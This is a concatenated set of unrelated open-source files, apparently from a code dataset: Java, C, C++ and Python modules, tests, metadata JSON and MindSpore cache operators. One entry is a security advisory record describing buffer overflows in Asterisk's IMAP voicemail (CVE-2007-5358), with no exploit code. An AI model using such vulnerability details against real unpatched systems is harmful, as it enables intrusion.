size /= np.random.uniform(*self.config['base_aug']['scale'])
# crop
new_bbox = [int(centerx - size / 2.), int(centery - size / 2.), int(size), int(size)]
modal1 = cv2.resize(utils.crop_padding(modal[idx1], new_bbox, pad_value=(0,)),
(self.sz, self.sz), interpolation=cv2.INTER_NEAREST)
modal2 = cv2.resize(utils.crop_padding(modal[idx2], new_bbox, pad_value=(0,)),
(self.sz, self.sz), interpolation=cv2.INTER_NEAREST)
# flip
if self.config['base_aug']['flip'] and np.random.rand() > 0.5:
flip = True
modal1 = modal1[:, ::-1]
modal2 = modal2[:, ::-1]
else:
flip = False
if load_rgb:
rgb = np.array(self._load_image(os.path.join(
self.config['{}_image_root'.format(self.phase)], imgfn))) # uint8
rgb = cv2.resize(utils.crop_padding(rgb, new_bbox, pad_value=(0,0,0)),
(self.sz, self.sz), interpolation=cv2.INTER_CUBIC)
if flip:
rgb = rgb[:, ::-1, :]
rgb = torch.from_numpy(rgb.astype(np.float32).transpose((2, 0, 1)) / 255.)
rgb = self.img_transform(rgb) # CHW
if load_rgb:
return modal1, modal2, rgb
else:
return modal1, modal2, None
def _get_pair_ind(self, idx):
modal, category, bboxes, amodal, image_fn = self.data_reader.get_image_instances(
idx, with_gt=True)
gt_order_matrix = infer.infer_gt_order(modal, amodal)
pairs = np.where(gt_order_matrix == 1)
if len(pairs[0]) == 0:
return self._get_pair_ind(np.random.choice(len(self)))
return modal, bboxes, image_fn, pairs
def __getitem__(self, idx):
if self.memcached:
self._init_memcached()
modal, bboxes, image_fn, pairs = self._get_pair_ind(idx)
randidx = np.random.choice(len(pairs[0]))
idx1 = pairs[0][randidx]
idx2 = pairs[1][randidx]
# get pair
modal1, modal2, rgb = self._get_pair(
modal, bboxes, idx1, idx2, image_fn,
load_rgb=self.config['load_rgb'], randshift=True)
if rgb is None:
rgb = torch.zeros((3, self.sz, self.sz), dtype=torch.float32) # 3HW
modal_tensor1 = torch.from_numpy(
modal1.astype(np.float32)).unsqueeze(0) # 1HW, float
modal_tensor2 = torch.from_numpy(
modal2.astype(np.float32)).unsqueeze(0) # 1HW, float
if np.random.rand() < 0.5:
return rgb, modal_tensor1, modal_tensor2, 1
else:
return rgb, modal_tensor2, modal_tensor1, 0
| 4,991 |
1,020 | package org.robobinding.viewattribute.property;
import org.robobinding.attribute.PropertyAttributeParser;
import org.robobinding.attribute.ValueModelAttribute;
/**
* @since 1.0
* @author <NAME>
*
*/
public class PropertyViewAttributeBinderFactory {
private final Implementor implementor;
private final PropertyAttributeParser propertyAttributeParser;
public PropertyViewAttributeBinderFactory(Implementor implementor, PropertyAttributeParser propertyAttributeParser) {
this.implementor = implementor;
this.propertyAttributeParser = propertyAttributeParser;
}
public PropertyViewAttributeBinder create(Object view, String attributeName, String attributeValue) {
ValueModelAttribute attribute = propertyAttributeParser.parseAsValueModelAttribute(attributeName, attributeValue);
return create(view, attribute);
}
public PropertyViewAttributeBinder create(Object view, ValueModelAttribute attribute) {
return implementor.create(view, attribute);
}
public static interface Implementor {
PropertyViewAttributeBinder create(Object view, ValueModelAttribute attribute);
}
}
| 310 |
700 | <gh_stars>100-1000
#include <loadcore.h>
#include <bdm.h>
#include <sifcmd.h>
#include <irx.h>
IRX_ID("bdmevent", 1, 1);
static void bdm_callback(int cause)
{
static SifCmdHeader_t EventCmdData;
EventCmdData.opt = cause;
sceSifSendCmd(0, &EventCmdData, sizeof(EventCmdData), NULL, NULL, 0);
}
int _start(int argc, char *argv[])
{
bdm_RegisterCallback(&bdm_callback);
return MODULE_RESIDENT_END;
}
| 181 |
4,822 | <gh_stars>1000+
/*
* SPDX-License-Identifier: Apache-2.0
*
* The OpenSearch Contributors require contributions made to
* this file be licensed under the Apache-2.0 license or a
* compatible open source license.
*/
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Modifications Copyright OpenSearch Contributors. See
* GitHub history for details.
*/
package org.opensearch.search.sort;
import org.opensearch.common.Strings;
import org.opensearch.common.io.stream.NamedWriteableRegistry;
import org.opensearch.common.time.DateFormatter;
import org.opensearch.common.xcontent.ToXContentFragment;
import org.opensearch.common.xcontent.XContentBuilder;
import org.opensearch.index.mapper.DateFieldMapper;
import org.opensearch.search.DocValueFormat;
import org.opensearch.test.AbstractNamedWriteableTestCase;
import java.io.IOException;
import java.time.ZoneId;
import static org.hamcrest.Matchers.equalTo;
import static org.hamcrest.Matchers.greaterThan;
import static org.hamcrest.Matchers.lessThan;
public class SortValueTests extends AbstractNamedWriteableTestCase<SortValue> {
private static final DocValueFormat STRICT_DATE_TIME = new DocValueFormat.DateTime(
DateFormatter.forPattern("strict_date_time"),
ZoneId.of("UTC"),
DateFieldMapper.Resolution.MILLISECONDS
);
@Override
protected Class<SortValue> categoryClass() {
return SortValue.class;
}
@Override
protected NamedWriteableRegistry getNamedWriteableRegistry() {
return new NamedWriteableRegistry(SortValue.namedWriteables());
}
@Override
protected SortValue createTestInstance() {
return randomBoolean() ? SortValue.from(randomDouble()) : SortValue.from(randomLong());
}
@Override
protected SortValue mutateInstance(SortValue instance) throws IOException {
return randomValueOtherThanMany(mut -> instance.getKey().equals(mut.getKey()), this::createTestInstance);
}
public void testFormatDouble() {
assertThat(SortValue.from(1.0).format(DocValueFormat.RAW), equalTo("1.0"));
// The date formatter coerces the double into a long to format it
assertThat(SortValue.from(1.0).format(STRICT_DATE_TIME), equalTo("1970-01-01T00:00:00.001Z"));
}
public void testFormatLong() {
assertThat(SortValue.from(1).format(DocValueFormat.RAW), equalTo("1"));
assertThat(SortValue.from(1).format(STRICT_DATE_TIME), equalTo("1970-01-01T00:00:00.001Z"));
}
public void testToXContentDouble() {
assertThat(toXContent(SortValue.from(1.0), DocValueFormat.RAW), equalTo("{\"test\":1.0}"));
// The date formatter coerces the double into a long to format it
assertThat(toXContent(SortValue.from(1.0), STRICT_DATE_TIME), equalTo("{\"test\":\"1970-01-01T00:00:00.001Z\"}"));
}
public void testToXContentLong() {
assertThat(toXContent(SortValue.from(1), DocValueFormat.RAW), equalTo("{\"test\":1}"));
assertThat(toXContent(SortValue.from(1), STRICT_DATE_TIME), equalTo("{\"test\":\"1970-01-01T00:00:00.001Z\"}"));
}
public void testCompareDifferentTypes() {
assertThat(SortValue.from(1.0), lessThan(SortValue.from(1)));
assertThat(SortValue.from(Double.MAX_VALUE), lessThan(SortValue.from(Long.MIN_VALUE)));
assertThat(SortValue.from(1), greaterThan(SortValue.from(1.0)));
assertThat(SortValue.from(Long.MIN_VALUE), greaterThan(SortValue.from(Double.MAX_VALUE)));
}
public void testCompareDoubles() {
double r = randomDouble();
assertThat(SortValue.from(r), equalTo(SortValue.from(r)));
assertThat(SortValue.from(r), lessThan(SortValue.from(r + 1)));
assertThat(SortValue.from(r), greaterThan(SortValue.from(r - 1)));
}
public void testCompareLongs() {
long r = randomLongBetween(Long.MIN_VALUE + 1, Long.MAX_VALUE - 1);
assertThat(SortValue.from(r), equalTo(SortValue.from(r)));
assertThat(SortValue.from(r), lessThan(SortValue.from(r + 1)));
assertThat(SortValue.from(r), greaterThan(SortValue.from(r - 1)));
}
public String toXContent(SortValue sortValue, DocValueFormat format) {
return Strings.toString(new ToXContentFragment() {
@Override
public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException {
builder.field("test");
return sortValue.toXContent(builder, format);
}
});
}
}
| 1,883 |
759 | /*
* Copyright 2018 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package com.rometools.modules.psc.io;
/**
* Constant definitions for XML attribute names.
*/
public interface PodloveSimpleChapterAttribute {
// namespace prefix
/** "psc". */
String PREFIX = "psc";
// name of the list of chapters
/** "chapters". */
String CHAPTERS = "chapters";
/** "version". */
String VERSION = "version";
// name of a chapter entry
/** "chapter". */
String CHAPTER = "chapter";
// attributes of single chapter entries
/** "start". */
String START = "start";
/** "title". */
String TITLE = "title";
/** "href". */
String HREF = "href";
/** "image". */
String IMAGE = "image";
}
| 398 |
47,880 | <filename>guava/src/com/google/common/collect/AllEqualOrdering.java
/*
* Copyright (C) 2012 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import com.google.common.annotations.GwtCompatible;
import java.io.Serializable;
import java.util.List;
import javax.annotation.CheckForNull;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* An ordering that treats all references as equals, even nulls.
*
* @author <NAME>
*/
@GwtCompatible(serializable = true)
@ElementTypesAreNonnullByDefault
final class AllEqualOrdering extends Ordering<@Nullable Object> implements Serializable {
static final AllEqualOrdering INSTANCE = new AllEqualOrdering();
@Override
public int compare(@CheckForNull Object left, @CheckForNull Object right) {
return 0;
}
@Override
public <E extends @Nullable Object> List<E> sortedCopy(Iterable<E> iterable) {
return Lists.newArrayList(iterable);
}
@Override
@SuppressWarnings("nullness") // unsafe: see supertype
public <E extends @Nullable Object> ImmutableList<E> immutableSortedCopy(Iterable<E> iterable) {
return ImmutableList.copyOf(iterable);
}
@SuppressWarnings("unchecked")
@Override
public <S extends @Nullable Object> Ordering<S> reverse() {
return (Ordering<S>) this;
}
private Object readResolve() {
return INSTANCE;
}
@Override
public String toString() {
return "Ordering.allEqual()";
}
private static final long serialVersionUID = 0;
}
| 612 |
435 | <filename>writethedocs-na-2016/videos/oops-i-became-an-engineer.json
{
"description": "<NAME>\nhttp://lanyrd.com/2016/writethedocs/sfbzty/\nFrom English professor and assistant dean to software engineer. How the heck did that happen? How hard was the transition? That seems\u2026different. And what the heck are developers thinking when they say the code explains itself? These are some of the comments and questions folks ask me when they learn my background.\nIncluded will be some commentary on learning to code, job prospects, and ways in which engineering is like grad school (for English). Also covered will be why development is an awesome career for folks who love words, grammar, and writing. Find out what\u2019s up with developers, documentation, and denying the need for it (DID YOU SEE THAT ALLITERATION? My gawd, I\u2019ve still got it).\nWhether you\u2019ve thought about moving into software engineering yourself, or maybe you want to hear how one can go about learning hard, new stuff, this may be the 15 minutes during which you\u2019ll want to skip the hallway track.",
"language": "eng",
"recorded": "2016-05-22",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/b_Bo0sHEc7A/hqdefault.jpg",
"title": "Oops, I Became an Engineer",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=b_Bo0sHEc7A"
}
]
}
| 426 |
454 | <reponame>zwkjhx/vertx-zero
package io.vertx.up.annotations;
import io.vertx.up.eon.em.IpcType;
import java.lang.annotation.*;
/**
* Internal Rpc Channel
*/
@Target({ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@Documented
@Inherited
public @interface Ipc {
/**
* Communication type ( 4 categories )
*
* @return different categories of Ipc
*/
IpcType type() default IpcType.UNITY;
/**
* Default Rpc Service Name
* 1. name != "" -> Sender
* 2. name == "" -> Consumer ( Worker )
*
* @return identify rpc roles: 3 categories
*/
String name() default "";
/**
* Event Bus address, this address must be used with name(), it means that
* current Ipc should be send message to
* 1. Service ( name = xxx, from = xxx )
*
* @return Used in originasor and coordinator
*/
String to() default "";
/**
* Event Bus address, this address must be used standalone, it means that
* current Ipc should read message only and do not send out.
* 1. Service ( name = current )
* 2. value is used instead of from direction.
*
* @return Default value help to identify roles.
*/
String value() default "";
}
| 458 |
328 | package com.ctg.test.controller;
import com.ctg.test.model.User;
import com.ctg.test.service.UserService;
import org.apache.commons.lang.exception.ExceptionUtils;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authz.annotation.RequiresPermissions;
import org.apache.shiro.authz.annotation.RequiresRoles;
import org.apache.shiro.subject.Subject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* @Description:
* @Author: yanhonghai
* @Date: 2018/9/17 1:00
* @RequiresRoles(value={"admin","user"},logical = Logical.OR)
* @RequiresPermissions(value={"add","update"},logical = Logical.AND)
*/
@Controller
@RequestMapping("/user")
public class UserController {
private static final Logger logger = LoggerFactory.getLogger(UserController.class);
@Autowired
UserService userService;
/**
* http://localhost:8090/user/testDb
* @return
*/
@RequestMapping(value = {"/testDb"})
@ResponseBody
public Object testDb() {
Map<String, Object> result = new HashMap<>();
try {
List<User> users = userService.findAll();
result.put("code", "200");
result.put("msg", "success");
result.put("result", users);
} catch (Exception e) {
result.put("code", "201");
result.put("msg", ExceptionUtils.getFullStackTrace(e));
}
return result;
}
/**
* 测试@RequiresRoles
* http://localhost:8090/user/testRequiresRoles
*user1 user2 admin用户测试即可,密码都是<PASSWORD>
* @return
*/
@RequiresRoles({"admin"})
@RequestMapping(value = {"/testRequiresRoles"})
@ResponseBody
public Object testRequiresRoles() {
Map<String, Object> result = new HashMap<>();
try {
List<User> users = userService.findAll();
result.put("code", "200");
result.put("msg", "success");
result.put("result", users);
} catch (Exception e) {
result.put("code", "201");
result.put("msg", ExceptionUtils.getFullStackTrace(e));
}
return result;
}
/**
* 测试@RequiresPermissions
* http://localhost:8090/user/testRequiresPermissions
* user1 user2 admin用户测试即可,密码都是<PASSWORD>
*
* @return
*/
@RequestMapping(value = {"/testRequiresPermissions"})
@ResponseBody
@RequiresPermissions("delete")
public Object testRequiresPermissions() {
Map<String, Object> result = new HashMap<>();
List<User> users = userService.findAll();
result.put("code", "200");
result.put("msg", "success");
result.put("result", users);
return result;
}
/**
* http://localhost:8090/user/userInfo
*
* @return
*/
@RequestMapping(value = {"/userInfo"})
@ResponseBody
public Object user() {
Map<String, Object> result = new HashMap<>();
Subject subject = SecurityUtils.getSubject();
result.put("subject.getPrincipal()", subject.getPrincipal());
result.put("subject.getPrincipals()", subject.getPrincipals());
// 用户认证状态
Boolean isAuthenticated = subject.isAuthenticated();
System.out.println("用户认证状态:" + isAuthenticated);
result.put("RememberMe:", subject.isRemembered());
return result;
}
} | 1,570 |
856 | //
// Copyright © 2017 Arm Ltd. All rights reserved.
// SPDX-License-Identifier: MIT
//
#pragma once
#include <backendsCommon/Workload.hpp>
#include <arm_compute/runtime/IFunction.h>
#include <arm_compute/core/Error.h>
#include <arm_compute/runtime/CL/CLTensor.h>
namespace armnn
{
arm_compute::Status ClDepthwiseConvolutionWorkloadValidate(const TensorInfo& input,
const TensorInfo& output,
const DepthwiseConvolution2dDescriptor& descriptor,
const TensorInfo& weights,
const Optional<TensorInfo>& biases,
const ActivationDescriptor* activationDescriptor = nullptr);
class ClDepthwiseConvolutionWorkload : public BaseWorkload<DepthwiseConvolution2dQueueDescriptor>
{
public:
using BaseWorkload<DepthwiseConvolution2dQueueDescriptor>::m_Data;
ClDepthwiseConvolutionWorkload(const DepthwiseConvolution2dQueueDescriptor& descriptor,
const WorkloadInfo& info,
const arm_compute::CLCompileContext& clCompileContext);
void Execute() const override;
protected:
std::unique_ptr<arm_compute::IFunction> m_DepthwiseConvolutionLayer;
std::unique_ptr<arm_compute::CLTensor> m_KernelTensor;
std::unique_ptr<arm_compute::CLTensor> m_BiasTensor;
void FreeUnusedTensors();
};
} //namespace armnn
| 779 |
325 | <filename>cli/src/main/java/com/box/l10n/mojito/cli/command/checks/GlossaryCaseCheckerSearchResult.java
package com.box.l10n.mojito.cli.command.checks;
import java.util.List;
class GlossaryCaseCheckerSearchResult {
List<String> failures;
boolean isSuccess;
boolean isMajorFailure;
final String source;
public GlossaryCaseCheckerSearchResult(String source) {
this.source = source;
this.isSuccess = true;
}
public boolean isSuccess() {
return isSuccess;
}
public boolean isMajorFailure() {
return isMajorFailure;
}
public List<String> getFailures() {
return failures;
}
public String getSource() {
return source;
}
}
| 280 |
5,250 | <gh_stars>1000+
/* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.flowable.cmmn.test.listener;
import org.flowable.task.service.delegate.DelegateTask;
import org.flowable.task.service.delegate.TaskListener;
import org.flowable.task.service.impl.persistence.entity.TaskEntityImpl;
/**
* @author martin.grofcik
*/
public class TestTaskOriginalAssigneeListener implements TaskListener {
@Override
public void notify(DelegateTask delegateTask) {
delegateTask.setVariable("taskId", delegateTask.getId());
delegateTask.setVariable("previousAssignee", ((TaskEntityImpl) delegateTask).getOriginalAssignee());
delegateTask.setVariable("currentAssignee", delegateTask.getAssignee());
}
}
| 368 |
2,542 | <filename>src/prod/src/client/StartNodeResult.h
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#pragma once
namespace Client
{
class StartNodeResult
: public Api::IStartNodeResult
, public Common::ComponentRoot
{
DENY_COPY(StartNodeResult);
public:
StartNodeResult(
__in Management::FaultAnalysisService::StartNodeStatus && nodeStatus);
std::shared_ptr<Management::FaultAnalysisService::NodeResult> const & GetNodeResult() override;
private:
Management::FaultAnalysisService::StartNodeStatus nodeStatus_;
};
}
| 254 |
892 | <reponame>westonsteimel/advisory-database-github
{
"schema_version": "1.2.0",
"id": "GHSA-qx34-mm7f-757c",
"modified": "2022-05-01T18:32:26Z",
"published": "2022-05-01T18:32:26Z",
"aliases": [
"CVE-2007-5358"
],
"details": "Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields. NOTE: vector 2 requires write access to Asterisk configuration files.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5358"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
},
{
"type": "WEB",
"url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
},
{
"type": "WEB",
"url": "http://osvdb.org/38201"
},
{
"type": "WEB",
"url": "http://osvdb.org/38202"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/27184"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/26005"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1018804"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2007/3454"
}
],
"database_specific": {
"cwe_ids": [
"CWE-119"
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 876 |
1,811 | <reponame>fc1943s/Paket
{
"FSharp.excludeProjectDirectories": [
".git",
"paket-files",
"integrationtests/scenarios",
"packages"
]
}
| 90 |
407 | import sys
si = sys.stdin.readline
n, c = list(map(int, si().split()))
a = []
for i in range(n):
a.append(int(si()))
def determination(D):
cnt, last = 1, a[0]
for i in range(1, n):
if a[i] - last < D: continue
last = a[i]
cnt += 1
return cnt >= c
a.sort()
l, r, ans = 1, 1000000000, 0
while l <= r:
mid = (l + r) // 2
if determination(mid):
ans = mid
l = mid + 1
else:
r = mid - 1
print(ans) | 238 |
14,668 | // Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <stddef.h>
#include <stdint.h>
#include <fuzzer/FuzzedDataProvider.h>
#include "base/at_exit.h"
#include "base/check.h"
#include "base/i18n/icu_util.h"
#include "extensions/common/url_pattern.h"
#include "url/gurl.h"
namespace extensions {
namespace {
struct Environment {
Environment() { CHECK(base::i18n::InitializeICU()); }
// Initialize the "at exit manager" singleton used by the tested code.
base::AtExitManager at_exit_manager;
};
} // namespace
extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {
static Environment env;
FuzzedDataProvider fuzzed_data_provider(data, size);
URLPattern url_pattern(
/*valid_schemes=*/fuzzed_data_provider.ConsumeIntegral<int>());
if (url_pattern.Parse(fuzzed_data_provider.ConsumeRandomLengthString()) !=
URLPattern::ParseResult::kSuccess) {
return 0;
}
GURL url(fuzzed_data_provider.ConsumeRandomLengthString());
url_pattern.MatchesURL(url);
return 0;
}
} // namespace extensions
| 416 |
3,200 | <filename>mindspore/python/mindspore/ops/operations/_embedding_cache_ops.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""cache_ops"""
from ..._checkparam import Validator as validator
from ...common import dtype as mstype
from ..primitive import prim_attr_register, PrimitiveWithCheck
from .. import signature as sig
class UpdateCache(PrimitiveWithCheck):
"""
Update the value fo input_x, similar to ScatterNdUpdate.
The difference is that UpdateCache will not update when indices < 0 or indices >= max_num.
Inputs:
- **input_x** (Parameter) - Parameter which is going to be updated.
- **indices** (Tensor) - Update indices of input_x.
- **updates** (Tensor) - The update values.
Outputs:
- **out** (Tensor) - Returns a [1] Tensor, which is not useful.
"""
__mindspore_signature__ = (
sig.make_sig('input_x', sig.sig_rw.RW_WRITE,
dtype=sig.sig_dtype.T),
sig.make_sig('indices', dtype=sig.sig_dtype.T1),
sig.make_sig('updates', dtype=sig.sig_dtype.T),
sig.make_sig('max_num', dtype=sig.sig_dtype.T1)
)
@prim_attr_register
def __init__(self):
"""init UpdateCache"""
self.init_prim_io_names(inputs=['input_x', 'indices', 'update', 'max_num'],
outputs=['out'])
def check_shape(self, input_x_shape, indices_shape, update_shape, max_num_shape):
return [1]
def check_dtype(self, input_x_dtype, indices_dtype, update_dtype, max_num_dtype):
validator.check_tensor_dtype_valid(
"indices", indices_dtype, mstype.int_type, self.name)
return input_x_dtype
class SubAndFilter(PrimitiveWithCheck):
"""
Dynamic kernel, sub an offset and
return the elements which in range [0, max_num).
Inputs:
- **input_x** (Tensor) - Input tensor.
- **max_num** (Int) - The max value of element that after sub `offset`.
- **offset** (int) - Specifies the offset value of this `input_x`.
Outputs:
tuple(Tensor), tuple of 2 tensors, filter_res and filter_idx.
- **filter_res** (Tensor) - The result that `input_x` minus `offset`,
and return which in the range [0, max_num).
- **filter_idx** (Tensor) - A tensor containing indices of elements in the input
coressponding to the output tensor.
Supported Platforms:
`CPU`
Examples:
>>> x = Tensor(np.array([1, 3, 5, 8, 9, 16]), mindspore.int32)
>>> max_num = 10
>>> offset = 5
>>> output = ops.SubAndFilter()(x, max_num, offset)
>>> print(output)
(Tensor(shape=[3], dtype=Int32, value= [0, 3, 4]),
Tensor(shape=[3], dtype=Int32, value= [2, 3, 4]))
"""
@prim_attr_register
def __init__(self):
"""init SubAndFilter"""
self.init_prim_io_names(inputs=['input_x', 'max_num', 'offset'],
outputs=['sub_res', 'sub_idx'])
def check_shape(self, input_x_shape, max_num_shape, offset_shape):
return ((-1,), (-1,))
def check_dtype(self, input_x_dtype, max_num_dtype, offset_dtype):
validator.check_tensor_dtype_valid(
"input_x", input_x_dtype, mstype.int_type, self.name)
return input_x_dtype
class MapUniform(PrimitiveWithCheck):
"""
Map a tensor by using fomula : value = key % `group_num` * `per_group_size` + key // `group_num`.
Inputs:
- **input** (Tensor) - Input Tensor.
- **per_group_size** (int) - The size of each group.
- **group_num** (int) - The number of group.
Outputs:
Tensor, has the same dtype and shape as the `input`.
Supported Platforms:
`CPU`
Examples:
>>> input_x = Tensor(np.array([0, 1, 2, 3, 4, 5, 6, 7]))
>>> per_group_size = 4
>>> group_num = 2
>>> map_uniform = ops.MapUniform()
>>> output = map_uniform(input_x, per_group_size, group_num)
>>> print(output)
[0, 4, 1, 5, 2, 6, 3, 7]
"""
@prim_attr_register
def __init__(self):
"""init MapUniform"""
self.init_prim_io_names(inputs=['input', 'per_group_size', 'group_num'],
outputs=['output'])
def check_dtype(self, input_dtype, per_group_size_dtype, group_num_dtype):
validator.check_tensor_dtype_valid(
"input", input_dtype, mstype.int_type, self.name)
validator.check_value_type(
'per_group_size', per_group_size_dtype, [mstype.Int], self.name)
validator.check_value_type(
'group_num', group_num_dtype, [mstype.Int], self.name)
class CacheSwapTable(PrimitiveWithCheck):
"""
Delete a hashmap entry,and insert a new key to hashmap, return the key and value of delete entry.
Inputs:
- **cache_table** (Parameter) - The cache table which is on device.
- **swap_cache_idx** (Tensor) - The index of table which need to swap. -1 is skipped.
- **miss_value** (int) - The values which arg going to swap into cache table.
Outputs:
- **old_value** (Tensor) - The values which are swapped out.
"""
__mindspore_signature__ = (
sig.make_sig('cache_table', sig.sig_rw.RW_WRITE,
dtype=sig.sig_dtype.T),
sig.make_sig('swap_cache_idx', dtype=sig.sig_dtype.T1),
sig.make_sig('miss_value', dtype=sig.sig_dtype.T)
)
@prim_attr_register
def __init__(self):
"""init CacheSwapTable"""
self.init_prim_io_names(inputs=['cache_table', 'swap_cache_idx', 'miss_value'],
outputs=['old_value'])
def check_shape(self, cache_table_shape, swap_cache_idx_shape, miss_value_shape):
if len(cache_table_shape) != 2:
raise ValueError(
"cache table shape must be 2, but got %d" % len(cache_table_shape))
return miss_value_shape
def check_dtype(self, cache_table_dtype, swap_cache_idx_dtype, miss_value_dtype):
validator.check_tensor_dtype_valid(
"swap_cache_idx", swap_cache_idx_dtype, mstype.int_type, self.name)
return miss_value_dtype
class MapCacheIdx(PrimitiveWithCheck):
"""
MapCacheIdx merge SearchCacheIdx, CacheSwapHashmap, UpdateCache together.
When input an indices tensor, it will output the cache indices which search in hashmap.
"""
__mindspore_signature__ = (
sig.make_sig('hashmap', sig.sig_rw.RW_WRITE,
dtype=sig.sig_dtype.T),
sig.make_sig('indices', dtype=sig.sig_dtype.T),
sig.make_sig('step', dtype=sig.sig_dtype.T),
sig.make_sig('emb_max_num', dtype=sig.sig_dtype.T),
sig.make_sig('cache_max_num', dtype=sig.sig_dtype.T)
)
@prim_attr_register
def __init__(self):
"""init MapCacheIdx"""
self.init_prim_io_names(inputs=['hashmap', 'indices', 'step', 'emb_max_num', 'offset'],
outputs=['cache_idx', 'old_emb_idx', 'miss_emb_idx', 'swap_cache_idx'])
def __check__(self, hashmap, indices, step, emb_max_num, offset):
hashmap_shape = hashmap['shape']
if len(hashmap_shape) != 2:
raise ValueError("The dimension of 'hashmap' in SearchCacheIdx must be 2, "
"but got %d." % len(hashmap_shape))
out_shape = (indices['shape'], -1, -1, -1)
hashmap_dtype = hashmap['dtype']
indices_dtype = indices['dtype']
args = {"hashmap": hashmap_dtype, "indices": indices_dtype}
validator.check_tensors_dtypes_same_and_valid(
args, mstype.int_type, self.name)
out_dtype = (hashmap_dtype, hashmap_dtype,
hashmap_dtype, hashmap_dtype)
out = {'shape': out_shape,
'dtype': out_dtype,
'value': None}
if 'max_shape' in indices:
out['max_shape'] = (indices['max_shape'], indices['max_shape'],
indices['max_shape'], indices['max_shape'])
else:
out['max_shape'] = (indices['shape'], indices['shape'],
indices['shape'], indices['shape'])
if 'min_shape' in indices:
out['min_shape'] = (indices['min_shape'], 0, 0, 0)
else:
out['min_shape'] = (0, 0, 0, 0)
return out
class DynamicAssign(PrimitiveWithCheck):
"""
Assigns `Parameter` with a value, the `value` can have a dynamic shape.
Inputs:
- **variable** (Parameter) - The `Parameter`.
- **value** (Tensor) - The value to be assigned.
Outputs:
Tensor, has the same type as original `variable`.
Supported Platforms:
`CPU`
"""
__mindspore_signature__ = (
sig.make_sig('variable', sig.sig_rw.RW_WRITE, dtype=sig.sig_dtype.T),
sig.make_sig('value', dtype=sig.sig_dtype.T)
)
@prim_attr_register
def __init__(self):
self.init_prim_io_names(inputs=['ref', 'value'], outputs=['output'])
def check_dtype(self, variable, value):
if variable != mstype.type_refkey:
validator.check_tensor_dtype_valid(
"variable", variable, mstype.number_type, self.name)
validator.check_scalar_or_tensor_types_same(
{"value": value}, mstype.number_type, self.name)
class PadAndShift(PrimitiveWithCheck):
"""
Pad a tensor with -1, and shift with a length.
Inputs:
- **input_x** (Tensor) - The input Tensor, which will be copied
to `output`.
- **cum_sum_arr** (Tensor) - The last value of cum_sum_arr is
